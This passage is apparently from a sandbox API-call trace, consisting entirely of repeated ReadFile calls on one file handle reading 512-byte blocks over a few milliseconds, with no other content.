lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.496] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.497] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.500] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.500] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.501] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 
[0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.502] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, 
lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.503] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, 
lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.504] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.505] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.506] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, 